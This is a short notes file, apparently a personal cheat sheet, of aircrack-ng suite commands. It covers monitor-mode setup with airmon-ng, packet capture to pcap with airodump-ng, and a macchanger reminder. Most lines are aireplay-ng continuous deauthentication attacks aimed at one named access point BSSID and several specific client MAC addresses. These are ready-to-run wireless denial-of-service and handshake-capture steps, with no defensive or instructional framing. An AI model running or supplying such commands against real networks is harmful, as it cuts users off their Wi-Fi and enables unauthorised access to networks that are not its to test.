airodump-ng --channel 6  --output-format pcap -w /root/airodumps/0722
airodump-ng wlan0
airodump-ng --bssid --essid

aireplay-ng -a BC:2E:48:11:EC:E7 --deauth 0 wlan1mon
aireplay-ng -a BC:2E:48:11:EC:E7 --deauth 0  -c A8:66:7F:03:BF:C2 wlan1mon
aireplay-ng --deauth 0 -c 00:9D:6B:18:8C:6C wlan1mon
aireplay-ng -a BC:2E:48:11:EC:E7 --deauth 0  -c 34:79:16:FF:EF:F5 wlan1mon
aireplay-ng -a BC:2E:48:11:EC:E7 --deauth 0  -c 00:9D:6B:18:8C:6C wlan1mon

airmon-ng check wlan0
airmon-ng check kill
airmon-ng start wlan0

macchanger {
	examples {
		-s wlan1 (ensure correct MAC for airmon-ng cmds')
	}
}